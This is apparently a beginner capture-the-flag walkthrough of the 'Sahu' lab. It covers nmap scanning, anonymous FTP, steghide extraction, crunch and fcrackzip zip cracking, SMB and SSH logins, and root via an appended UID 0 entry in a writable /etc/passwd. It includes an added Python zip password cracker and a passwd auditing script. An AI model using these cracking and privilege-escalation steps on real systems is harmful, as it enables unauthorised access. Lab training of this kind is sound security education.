Today we are going to complete a boot2root challenge of the lab Sahu. The lab is developed by Vivek Gautam and can be downloaded from here. The lab is fairly easy and meant for beginners; it helps you get familiar with the concept of CTF challenges, and because it focuses almost entirely on enumeration it also develops your enumeration skills.
Penetration Testing Methodology

· Network Scanning
  o Netdiscover scan
  o Nmap scan
· Enumeration
  o Anonymous FTP login
  o Browsing HTTP service at port 80
  o Directory Bruteforce using dirb
  o Enumerating Source Code
  o Extracting hidden data using steghide
  o Dictionary Generation using Crunch
  o Bruteforce Zip Password using fcrackzip
· Exploitation
  o Connecting to Target using SMB
  o Enumerating SMB
  o Logging in over SSH
· Post Exploitation
  o Running LinEnum script
· Privilege Escalation
  o Writable /etc/passwd file
  o Generating Password Hash using Openssl
  o Appending hash to /etc/passwd
  o Getting Root Privileges
· Reading Root Flag
The first stage of the challenge is finding the target on the network. netdiscover lists the live hosts in the local subnet, and from its output we pick out the target's IP address (192.168.1.105 here):
netdiscover
After that we start active reconnaissance by scanning all 65535 TCP ports of the target with nmap; -A enables version detection, OS detection, the default NSE scripts and traceroute:
nmap -p- -A 192.168.1.105
The nmap output shows five open ports: 21 (FTP), 22 (SSH), 80 (HTTP), and 139 and 445 (NetBIOS-SSN / Samba). The default scripts run by -A also reported that anonymous FTP login is allowed, so we log in to FTP with the following command:
ftp 192.168.1.105
Use anonymous as the username; an anonymous FTP server accepts any password, so anonymous works as the password too. Once logged in, run ls to list the contents. A single file was found here, ftp.zip, which we download to the attacking machine with get ftp.zip.
When opened, the archive asked for a password, and since we did not know it yet we moved on. Opening the target's IP address in a browser shows the following web page:
Next we enumerated directories with dirb:
dirb http://192.168.1.105
As a result we found a directory /H/A/R/. Since the image on the web page was of Haryana, we can reasonably assume that the full path is /H/A/R/Y/A/N/A/, and opening it in the browser shows the following:
In the page source there is a phrase saying "try to extract with hurry". This is useful: we have an image on the page and a hint in the source that looks like a passphrase, so we use steghide to extract any data hidden inside the image:
steghide extract -sf Haryana-1-1.jpg
When prompted for the passphrase, enter hurry. As the image below shows, a file is extracted, and reading it gives the message: "I have found the password for a zip file but I have forgot the last part of it, can you find out. 5AHU**"
According to the hint, the first four characters of the password are 5AHU, the password is six characters long, and we have to find the last two. We can do this with crunch, building a dictionary to feed to a password cracker. In a crunch -t template, @ stands for a lowercase letter, , for an uppercase letter, % for a digit and ^ for a symbol, so the two unknown characters can be covered by listing combinations of these classes. The following commands build the dictionary (the first uses > to create dict.txt, the rest append to it with >>):
crunch 6 6 -t 5AHU@, > dict.txt
crunch 6 6 -t 5AHU@% >> dict.txt
crunch 6 6 -t 5AHU@^ >> dict.txt
crunch 6 6 -t 5AHU,% >> dict.txt
crunch 6 6 -t 5AHU%^ >> dict.txt
crunch 6 6 -t 5AHU^@ >> dict.txt
crunch 6 6 -t 5AHU^% >> dict.txt
Note that these seven templates cover only some of the sixteen ordered pairs of the four character classes (for example ,@ %@ @@ ,, %% and ^^ are missing). They were enough for this lab, but if the password were not found, the remaining templates would have to be appended as well.
Once our wordlist is created we can start the dictionary attack with fcrackzip (-D selects dictionary mode, -p names the wordlist, -v is verbose):
fcrackzip -D -p dict.txt ftp.zip -v
Without -u, fcrackzip only checks the one-byte password verifier in the ZipCrypto header, so it can print more than one "possible pw found" candidate; adding -u makes it confirm each hit with unzip. The password was cracked this way, and extracting the archive gave us a file ftp.txt containing a username and password.
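The crunch and fcrackzip steps above are the whole attack in two commands; the following Python script is an added example (not code from the original post or from the lab) that does the same known-prefix dictionary attack end to end and generalizes it: expand_pattern implements crunch's -t placeholders, known_prefix_wordlist enumerates all sixteen class pairs instead of the seven typed by hand, and crack_zip verifies each candidate by check byte and CRC the way fcrackzip -D -u does. So that it runs offline, it also writes its own password-protected ftp.zip with a minimal ZipCrypto writer; the archive's password (5AHU4#), its contents and the use of string.punctuation as the symbol set are assumptions made for the demo, not the lab's real values.

```python
import itertools
import os
import string
import struct
import tempfile
import zipfile
import zlib

# crunch -t placeholders; the symbol set is approximated with string.punctuation
CLASSES = {"@": string.ascii_lowercase, ",": string.ascii_uppercase,
           "%": string.digits, "^": string.punctuation}

def expand_pattern(pattern):
    """Expand one crunch-style template; non-placeholder characters are literal."""
    pools = [CLASSES.get(ch, ch) for ch in pattern]
    return ["".join(parts) for parts in itertools.product(*pools)]

def known_prefix_wordlist(prefix="5AHU", unknown=2):
    """Every ordered class combination for the tail (16 pairs for two chars),
    not just the seven templates typed by hand on the page."""
    words = []
    for classes in itertools.product(CLASSES, repeat=unknown):
        words.extend(expand_pattern(prefix + "".join(classes)))
    return words

def _make_crc_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table

_CRC_TABLE = _make_crc_table()

def _crc32_byte(crc, b):
    return _CRC_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)

class ZipCrypto:
    """Key schedule and keystream of traditional PKWARE encryption (APPNOTE 6.1)."""
    def __init__(self, password):
        self.keys = [0x12345678, 0x23456789, 0x34567890]
        for b in password:
            self._update(b)
    def _update(self, b):
        k = self.keys
        k[0] = _crc32_byte(k[0], b)
        k[1] = (k[1] + (k[0] & 0xFF)) & 0xFFFFFFFF
        k[1] = (k[1] * 134775813 + 1) & 0xFFFFFFFF
        k[2] = _crc32_byte(k[2], k[1] >> 24)
    def encrypt(self, plaintext):
        out = bytearray()
        for p in plaintext:
            t = self.keys[2] | 2
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(p)  # the keys advance on the plaintext byte
        return bytes(out)

def write_zipcrypto_archive(path, name, data, password):
    """One-entry, stored, ZipCrypto-encrypted zip that Python's zipfile can read."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 random bytes + the CRC's high byte. That byte is
    # the only fast password check, so 1 in 256 wrong guesses passes it (hence -u).
    header = os.urandom(11) + bytes([crc >> 24])
    body = ZipCrypto(password).encrypt(header + data)
    fname = name.encode()
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, 1, 0, 0, 0x21,
                        crc, len(body), len(data), len(fname), 0) + fname
    central = struct.pack("<4s6H3I5H2I", b"PK\x01\x02", 20, 20, 1, 0, 0, 0x21,
                          crc, len(body), len(data), len(fname),
                          0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1,
                       len(central), len(local) + len(body), 0)
    with open(path, "wb") as fh:
        fh.write(local + body + central + eocd)

def crack_zip(path, candidates):
    """First candidate that passes the header check AND gives a correct CRC
    (what fcrackzip -D -u does), as (password, plaintext); None if no hit."""
    with zipfile.ZipFile(path) as zf:
        name = zf.namelist()[0]
        for pw in candidates:
            try:
                with zf.open(name, pwd=pw.encode()) as f:
                    return pw, f.read()
            except (RuntimeError, zipfile.BadZipFile):
                continue  # bad check byte, or a check-byte collision caught by CRC
    return None

def demo():
    """Build a constructed ftp.zip (password and contents made up) and crack it."""
    password = "5AHU4#"  # assumed for the demo, not the lab's real password
    contents = b"constructed stand-in for ftp.txt\n"
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "ftp.zip")
        write_zipcrypto_archive(path, "ftp.txt", contents, password.encode())
        return crack_zip(path, known_prefix_wordlist("5AHU", 2))
```

demo() returns the recovered password together with the decrypted file contents. The full search space for two unknown characters is 94 × 94 = 8836 candidates, which the script exhausts in well under a second; the CRC check after the header byte is what keeps a 1-in-256 check-byte collision from being reported as a hit.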
Since nmap showed SMB on ports 139 and 445, the natural next step is to try these credentials against the target's Samba share, sambashare, with smbclient:
smbclient //192.168.1.105/sambashare -U sahu
When prompted, provide the password retrieved from ftp.txt. (If the share name were unknown, smbclient -L //192.168.1.105 -U sahu would list the shares visible to that account.)
Connecting through smbclient let us browse the share, where we found ssh.txt. Reading it revealed another username and password, and given the file name it is reasonable to assume these are SSH credentials. Let's try to log in over SSH:
ssh haryana@192.168.1.105
Provide the password when asked and the login succeeds. Once on the machine, we used wget to transfer the LinEnum script to the target, made it executable with chmod, and ran it.
LinEnum reported that /etc/passwd is writable by our user. That lets us append a new account whose UID and GID are 0, i.e. a second root. On Linux the password field of /etc/passwd normally holds only x, with the real hash kept in /etc/shadow, but if a hash is present in that field it is honoured, so all we need is a hash of a password we know.
To generate an MD5-crypt hash of the password pass123 with the salt raj, run the following on the attacking machine:
openssl passwd -1 -salt raj pass123
Now that we have the hash, we only need to append an entry containing it to /etc/passwd on the target. A passwd entry has seven colon-separated fields: username, password hash, UID, GID, comment, home directory and login shell. We set both UID and GID to 0 and use /bin/bash as the shell.
On the target machine we use echo with >> to append this line to /etc/passwd, and verify that the user was added by looking at the end of the file with tail. Now that the user exists, we switch to it with su followed by the new username and enter pass123. Because the user we created has UID 0, we own root on this machine.
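As an added example (not code from the original post or the lab), the Python below shows the same technique from both sides: rogue_root_entry builds the seven-field line that gets appended (the username raj, the /bin/bash shell and the hash value are assumptions; the hash is a placeholder with the shape of an openssl passwd -1 result, not a real hash of any password), and audit_passwd is the check a defender would run to catch it: a group- or world-writable passwd file, any entry other than root with UID 0, and any entry carrying a hash or an empty password field where x should be. The sample /etc/passwd content is constructed, not taken from the lab machine.

```python
import os
import stat
import tempfile

# Constructed sample of /etc/passwd; not copied from the lab machine.
CONSTRUCTED_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
haryana:x:1000:1000:haryana,,,:/home/haryana:/bin/bash
"""
# Placeholder with the shape of an openssl passwd -1 result; not a real hash.
PLACEHOLDER_HASH = "$1$raj$" + "X" * 22

def rogue_root_entry(user, pw_hash, shell="/bin/bash"):
    """The line appended in the walkthrough: UID 0 and GID 0 make it root-equivalent,
    and a hash in field two is honoured even though normal entries keep 'x' there."""
    return f"{user}:{pw_hash}:0:0:root:/root:{shell}\n"

def parse_passwd(text):
    """Split passwd lines into dicts; malformed lines are kept so they get reported."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "malformed": line})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw,
                        "uid": int(uid) if uid.isdigit() else None,
                        "gid": int(gid) if gid.isdigit() else None,
                        "home": home, "shell": shell})
    return entries

def audit_passwd(path):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{os.path.basename(path)} is group/world writable (mode {mode:04o})")
    with open(path) as fh:
        entries = parse_passwd(fh.read())
    for e in entries:
        if "malformed" in e:
            findings.append(f"line {e['line']}: malformed entry {e['malformed']!r}")
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"line {e['line']}: {e['name']} has UID 0")
        if e["pw"] == "":
            findings.append(f"line {e['line']}: {e['name']} has an empty password field")
        elif e["pw"] not in ("x", "*") and not e["pw"].startswith("!"):
            findings.append(f"line {e['line']}: {e['name']} carries a password hash in passwd")
    return findings

def demo():
    """Audit a clean copy, then the same file after the lab's misconfiguration
    and the rogue entry; returns (findings_before, findings_after)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "passwd")
        with open(path, "w") as fh:
            fh.write(CONSTRUCTED_PASSWD)
        os.chmod(path, 0o644)                 # normal permissions
        before = audit_passwd(path)
        os.chmod(path, 0o666)                 # the writable file LinEnum flagged
        with open(path, "a") as fh:
            fh.write(rogue_root_entry("raj", PLACEHOLDER_HASH))
        return before, audit_passwd(path)
```

The clean copy produces no findings; after the permission change and the appended line, the audit reports the writable mode, the extra UID 0 account and the inline hash. Pointing audit_passwd at a real /etc/passwd is the quickest way to confirm whether the LinEnum finding on a host has already been abused.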